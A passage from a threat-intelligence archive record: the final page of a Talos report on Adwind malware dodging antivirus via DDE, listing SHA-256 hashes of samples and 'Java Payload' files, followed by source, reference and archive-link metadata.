13\n\ne5d3890aaa15dc7ce4ac1e9c009462a9cd4ad4b7bdfd646b036dbf97b2ba8e43\r\ne6d0b74abbb00bb8f49303041cb230ced394a1fe790b0c43423dec3e7b16f5c9\r\ne7c7d4092a9815f975f7660cf2e68ee026788b100efacb9ae9fd8aace4ea5a7e\r\ne81ce4a4d92efa16e8c7e3247bc88920196a9c005db127388b8ab80a9337d416\r\neab1828a4a4432efba988cd17e8ab8c78ce9d9f00a184f9f62266ea6edb32a8e\r\nef60ca30ac8cf1a1895120ce3707084314b653d41eaad0a706f7a93192e37bc5\r\nef6cc3be0a91184b5748d5e184d30732981d49f39982c9ecfdb5069b15d5507b\r\nf3bdc2c1b7e520e42143f0d30e12f4e4b3de23b0f437846ba23e00ac2dc977e8\r\nf4464191d6b4056a1fd87c474d0908d4820110e1dab8925d0163b49a0bda1807\r\nf5b38ac9ac9a42a3558f6c8aab40569e27f3128843a1b090542076bc75e1eb26\r\nf607ec98a76e2e46caa6b692998aab0d8f06197ea2d0ea79bd1ff1dc1bfe47b0\r\nf6d86622dd5f013072fd82e2fe25f0874db701d3289ed0a1ab2bdc2d712b6a7c\r\nf87759062ab0a7039c7c9dd3131e3b5524b37b72add1e0c41c5e414e1de8ef32\r\nf93fbd2205f2e787e92af4eaa4467ed0f29aa48cfabcbeb7f923573553074269\r\nf94a4938c1d8caaec9114cb10c497833fea0c7c3ae4c7639213e73d1b02a0376\r\nf9700d80095ca548e7005c6783fc14446d685dae8cd73757df5be051b06ec305\r\nfa292d6024b47233f67b3ecfa58919cf79c8c06e43d7faa6a4a16c7088ece9d3\r\nfe4bad3464d5f3fe17618ecb4e61d8d26be234ce86c967c7ea99f043f86ad363\r\nfec6e6b73ee3df52c806acfaaac7cc69b28b0ed305f23856673d7500fdf55d6a\r\nff14275071170c594d03e4462f8144c91e7483e037c223f561f3784e0659b5c8\r\nff612c60c2fe5411dbf88ba3a4f923ec80d17d744be8752f82a8f15c9c6344ff\r\nJava Payload0a2f74a7787ae904e5a22a3c2b3acf0316c10b95fae08cced7ca5e2fcc7d9bf8\r\n0af2c5a46df16b98b9ab5af0ec455e98f6e1928c10ed8b6ffec69573498bdd8a\r\n65220dae459432deb1b038dbcbf8a379519a1a797b7b72f6408f94733bc5a2c2\r\n93280872f685f9c26d5f668ca1303f224a38d2b86ba707cdbb3d57427396e752\r\n93a482e554e2a37e6893fdd8cd92537c0ebc7363ac5fac44b7a4af4a2088ea24\r\nSource: https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html"
	],
	"report_names": [
		"adwind-dodgesav-dde.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438986,
	"ts_updated_at": 1775791334,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c36c5990653038b1d9797c26143c62059c2c6bd9.pdf",
		"text": "https://archive.orkl.eu/c36c5990653038b1d9797c26143c62059c2c6bd9.txt",
		"img": "https://archive.orkl.eu/c36c5990653038b1d9797c26143c62059c2c6bd9.jpg"
	}
}